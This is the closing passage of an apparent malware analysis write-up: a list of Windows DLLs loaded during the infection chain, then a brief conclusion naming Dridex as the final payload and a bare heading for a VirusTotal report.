     -> {C:\Windows\syswow64\MSCTF.dll}
     -> {C:\Windows\system32\api-ms-win-downlevel-shell32-l1-1-0.dll}
     -> {C:\Windows\syswow64\shell32.DLL}
     -> {C:\Windows\system32\IEFRAME.dll}
     -> {C:\Windows\syswow64\ole32.dll}
     -> {C:\Windows\syswow64\OLEAUT32.dll}
     -> {C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\comctl32.dll}
     -> {C:\Program Files (x86)\Internet Explorer\IEShims.dll}
     -> {C:\Windows\syswow64\comdlg32.dll}
     -> {C:\Windows\syswow64\api-ms-win-downlevel-ole32-l1-1-0.dll}
     -> {C:\Windows\syswow64\urlmon.dll}
     -> {C:\Windows\syswow64\WININET.dll}
     -> {C:\Windows\syswow64\USERENV.dll}
     -> {C:\Windows\syswow64\profapi.dll}
     -> {C:\Windows\system32\Secur32.dll}
     -> {C:\Windows\system32\api-ms-win-downlevel-advapi32-l2-1-0.dll}
     -> {C:\Windows\syswow64\WS2_32.dll}
     -> {C:\Windows\syswow64\NSI.dll}
     -> {C:\Windows\system32\mswsock.dll}
     -> {C:\Windows\System32\wship6.dll}
     -> {C:\Windows\system32\IPHLPAPI.DLL}
     -> {C:\Windows\system32\WINNSI.DLL}
     -> {C:\Windows\system32\CRYPTSP.dll}
     -> {C:\Windows\system32\rsaenh.dll}
     -> {C:\Windows\system32\RpcRtRemote.dll}
     -> {C:\Windows\syswow64\CLBCatQ.DLL}
     -> {C:\Program Files (x86)\Internet Explorer\ieproxy.dll}
     -> {C:\Windows\system32\api-ms-win-downlevel-shlwapi-l2-1-0.dll}
     -> {C:\Windows\system32\MSHTML.dll}
     -> {C:\Windows\system32\d2d1.dll}
     -> {C:\Windows\system32\DWrite.dll}
     -> {C:\Windows\system32\dxgi.dll}
     -> {C:\Windows\system32\dwmapi.dll}
     -> {C:\Windows\syswow64\WINTRUST.dll}
     -> {C:\Windows\syswow64\CRYPT32.dll}
     -> {C:\Windows\syswow64\MSASN1.dll}
     -> {C:\Windows\system32\d3d11.dll}
     -> {C:\Windows\system32\vm3dum_10.dll}
     -> {C:\Windows\system32\WINMM.dll}
     -> {C:\Windows\system32\dbghelp.dll}
     -> {C:\Windows\system32\bcrypt.dll}
     -> {C:\Windows\SysWOW64\bcryptprimitives.dll}
     -> {C:\Windows\system32\IEUI.dll}
     -> {C:\Windows\system32\SXS.DLL}
     -> {C:\Windows\system32\UxTheme.dll}
     -> {C:\Windows\system32\apphelp.dll}
     -> {C:\Windows\system32\DNSAPI.dll}
     -> {C:\Windows\system32\PROPSYS.dll}
     -> {C:\Windows\SysWOW64\ieapfltr.dll}
     -> {C:\Windows\SysWOW64\jscript9.dll}
     -> {C:\Windows\system32\msimtf.dll}
     -> {C:\Windows\system32\OLEACC.DLL}
     -> {C:\Windows\SysWOW64\uiautomationcore.dll}
     -> {C:\Windows\syswow64\PSAPI.DLL}
     -> {C:\Windows\system32\XmlLite.dll}
     -> {C:\Windows\System32\wshtcpip.dll}
     -> {C:\Windows\system32\rasadhlp.dll}
     -> {C:\Windows\System32\fwpuclnt.dll}



CONCLUSION

I only wanted to cover the technique used. In this attack the final payload was Dridex; however, the same delivery chain could have been used for many other malicious activities, e.g. hooks, data theft, ransomware, etc.

VIRUS TOTAL REPORT